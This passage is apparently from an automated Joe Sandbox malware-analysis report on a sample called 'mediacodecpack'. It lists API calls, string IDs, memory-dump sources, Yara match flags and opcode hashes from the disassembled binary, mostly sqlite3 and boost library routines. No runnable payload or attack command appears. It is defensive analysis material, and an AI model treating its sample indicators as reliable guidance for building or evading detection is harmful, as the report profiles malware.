                                                                                • Opcode Fuzzy Hash: 61e0f8eee9ad576660164a95c3b063aeb1f42e8fa1957af111c71ed02b3a0a22
                                                                                • Instruction Fuzzy Hash: 29F08C72500204AFDB04AF65EC88F9ABBACFF18710F508019FA04C6241D771E964CFE0
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 1477753154-0
                                                                                • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D02009
                                                                                • RtlDeleteCriticalSection.NTDLL(?), ref: 02D02028
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D02037
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D0204E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                • String ID:
                                                                                • API String ID: 2456309408-0
                                                                                • Opcode ID: 5efecf0520810530b2edba2fe2f264091d48d4b64288bfab891c1db3a622fa48
                                                                                • Instruction ID: d85baf1ae667ecfc3153229db7ed57fd4e6abdeff65989686a5d92fecd1207cc
                                                                                • Opcode Fuzzy Hash: 5efecf0520810530b2edba2fe2f264091d48d4b64288bfab891c1db3a622fa48
                                                                                • Instruction Fuzzy Hash: 1A01AD314017149BC738AF54E94CB9ABBB5EF24309F10491EE84292BA0C775AD58CFA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$H_prologSleep
                                                                                • String ID:
                                                                                • API String ID: 1765829285-0
                                                                                • Opcode ID: 0492c183ad0ac312b24eb5c6e8e11b2aefce1124da545d362d85dbbfa4d182ed
                                                                                • Instruction ID: d242251ece74041a8af19dd25489e4e0204e8841732f73a03f5c9721338d9e11
                                                                                • Opcode Fuzzy Hash: 0492c183ad0ac312b24eb5c6e8e11b2aefce1124da545d362d85dbbfa4d182ed
                                                                                • Instruction Fuzzy Hash: 8AF09A32A40110EFCB109F94E989B88BBA4FF0D321F1081A9F90A9B380C7349C18CBA0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: into$out of
                                                                                • API String ID: 632333372-1114767565
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmove
• String ID: &'
• API String ID: 3529519853-655172784
APIs
  • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
• sqlite3_free.SQLITE3 ref: 609193A3
Strings
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_freesqlite3_value_text
• String ID: (NULL)$NULL
• API String ID: 2175239460-873412390
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_log
• String ID: -- $d
• API String ID: 632333372-777087308
APIs
• GetCPInfo.KERNEL32(?,00000000), ref: 00405BB3
Strings
Memory Dump Source
• Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Info
• String ID: $
• API String ID: 1807457897-3032137957
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_log
• String ID: string or blob too big$|
• API String ID: 632333372-330586046
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_logsqlite3_value_text
• String ID: string or blob too big
• API String ID: 2320820228-2803948771
APIs
• WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D073D7,?,?,00000000), ref: 02D086D4
• getsockname.WS2_32(?,?,?), ref: 02D086EA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: ErrorLastgetsockname
• String ID: &'
• API String ID: 566540725-655172784
APIs
• __EH_prolog.LIBCMT ref: 02D0BCB8
  • Part of subcall function 02D0C294: std::exception::exception.LIBCMT ref: 02D0C2C3
  • Part of subcall function 02D0CA4A: __EH_prolog.LIBCMT ref: 02D0CA4F
  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
  • Part of subcall function 02D0C2F3: __EH_prolog.LIBCMT ref: 02D0C2F8
Strings
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D0BCF5
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D0BCEE
Memory Dump Source
• Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 1953324306-1943798000
APIs
• __EH_prolog.LIBCMT ref: 02D0BDAD
  • Part of subcall function 02D0C36B: std::exception::exception.LIBCMT ref: 02D0C398
  • Part of subcall function 02D0CB81: __EH_prolog.LIBCMT ref: 02D0CB86
  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
  • Part of subcall function 02D0C3C8: __EH_prolog.LIBCMT ref: 02D0C3CD
Strings
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D0BDEA
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D0BDE3
Memory Dump Source
• Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
• API String ID: 1953324306-412195191
APIs
• sqlite3_aggregate_context.SQLITE3 ref: 60914096
• sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
Strings
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
• String ID:
• API String ID: 3265351223-3916222277
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_stricmp
• String ID: log
• API String ID: 912767213-2403297477
                                                                                • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0396A
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D039C1
                                                                                  • Part of subcall function 02D01410: std::exception::exception.LIBCMT ref: 02D01428
                                                                                  • Part of subcall function 02D09622: __EH_prolog.LIBCMT ref: 02D09627
                                                                                  • Part of subcall function 02D09622: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D09636
                                                                                  • Part of subcall function 02D09622: __CxxThrowException@8.LIBCMT ref: 02D09655
                                                                                Strings
                                                                                • Day of month is not valid for year, xrefs: 02D039AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Day of month is not valid for year
                                                                                • API String ID: 1404951899-1521898139
                                                                                • Opcode ID: eb16074b02dee82f968441a71304b3146950371d1eb37b78206a6d098361cd46
                                                                                • Instruction ID: 2dd13edcb71019a8aa854a32f985d2c0a55c5b9a8a85a912f232862e785ffe35
                                                                                • Opcode Fuzzy Hash: eb16074b02dee82f968441a71304b3146950371d1eb37b78206a6d098361cd46
                                                                                • Instruction Fuzzy Hash: C4019E36814249AADB05EFA4D845BEEB779FF64B10F00441AFC04A3350EB709F59CBA5
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_strnicmp
                                                                                • String ID: SQLITE_
                                                                                • API String ID: 1961171630-787686576
                                                                                • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                APIs
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                Strings
                                                                                • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                • String ID: Invalid argument to rtreedepth()
                                                                                • API String ID: 1063208240-2843521569
                                                                                • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                APIs
                                                                                • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                  • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                  • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                  • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                  • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID: soft_heap_limit
                                                                                • API String ID: 1251656441-405162809
                                                                                • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 02D0EB1B
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D0EB30
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 4063778783-2104205924
                                                                                • Opcode ID: 5b59369ea94338b42a1b597a92f8bfe7254d566f72581927fd6f076022e39184
                                                                                • Instruction ID: 2f5586c84a846f7630ee2d8b502bc166bd9408e510c958b29af4e1f10274237d
                                                                                • Opcode Fuzzy Hash: 5b59369ea94338b42a1b597a92f8bfe7254d566f72581927fd6f076022e39184
                                                                                • Instruction Fuzzy Hash: 1BF0AE7060031A76EF14E6A8A995AAF73FCDF04714F500555EA11D37C0EF71ED14C591
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D03C1B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 02D03C30
                                                                                  • Part of subcall function 02D114C7: std::exception::exception.LIBCMT ref: 02D114D1
                                                                                  • Part of subcall function 02D0965B: __EH_prolog.LIBCMT ref: 02D09660
                                                                                  • Part of subcall function 02D0965B: __CxxThrowException@8.LIBCMT ref: 02D09689
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 1300498068-3145022300
                                                                                • Opcode ID: b965135cdd8a867bcba13d713027576447fbb8e9ce33150c6d11b7c71b1bc461
                                                                                • Instruction ID: 0ab1bbae888c5014d80bf86488a42d857afa3321930f6661e2248d9fa76d9d07
                                                                                • Opcode Fuzzy Hash: b965135cdd8a867bcba13d713027576447fbb8e9ce33150c6d11b7c71b1bc461
                                                                                • Instruction Fuzzy Hash: 6DF0A732900504DBC709DF54D4417EAB775EF52715F1041AEED0A57350CB729D4ACAA1
                                                                                APIs
                                                                                • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: NULL
                                                                                • API String ID: 632333372-324932091
                                                                                • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D038D2
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D038F1
                                                                                  • Part of subcall function 02D01410: std::exception::exception.LIBCMT ref: 02D01428
                                                                                  • Part of subcall function 02D07990: _memmove.LIBCMT ref: 02D079B0
                                                                                Strings
                                                                                • Year is out of valid range: 1400..10000, xrefs: 02D038E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Year is out of valid range: 1400..10000
                                                                                • API String ID: 3258419250-2344417016
                                                                                • Opcode ID: 42e78c89e654bdd77b3b60c30eb3b83fee70d3c9288a7c8df27e569f2d3e90b3
                                                                                • Instruction ID: 3d0c7dcd2a53f138686a959db870a3097933a629adcfac539a6b28f07c166f99
                                                                                • Opcode Fuzzy Hash: 42e78c89e654bdd77b3b60c30eb3b83fee70d3c9288a7c8df27e569f2d3e90b3
                                                                                • Instruction Fuzzy Hash: 27E09232E402245BEB14AB98C9527DDB779DF58718F00049AE805777C0DAB16D48CBE0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D03886
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D038A5
                                                                                  • Part of subcall function 02D01410: std::exception::exception.LIBCMT ref: 02D01428
                                                                                  • Part of subcall function 02D07990: _memmove.LIBCMT ref: 02D079B0
                                                                                Strings
                                                                                • Day of month value is out of range 1..31, xrefs: 02D03894
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Day of month value is out of range 1..31
                                                                                • API String ID: 3258419250-1361117730
                                                                                • Opcode ID: b9177f144503eb45fe3683455aa548c55f5bbb12d66a4501d19553d1075ad522
